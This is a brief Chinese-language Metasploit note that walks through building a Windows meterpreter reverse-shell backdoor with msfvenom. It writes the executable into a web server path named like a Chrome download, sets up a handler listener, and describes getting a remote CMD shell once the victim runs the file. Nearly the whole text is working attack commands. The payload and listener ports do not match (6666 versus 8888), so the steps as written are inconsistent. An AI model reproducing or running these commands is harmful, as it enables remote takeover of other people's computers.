msf记录
生成backdoor
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.187.133 LPORT=6666 -f exe >/var/www/html/chrome/1.exe
设置监听参数
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.187.133
set LPORT 8888
exploit
在windows机器上运行1.exe 上线 !
自动进入meterpreter
然后shell 进入CMD界面
https://blog.csdn.net/qq_42094992/article/details/109004560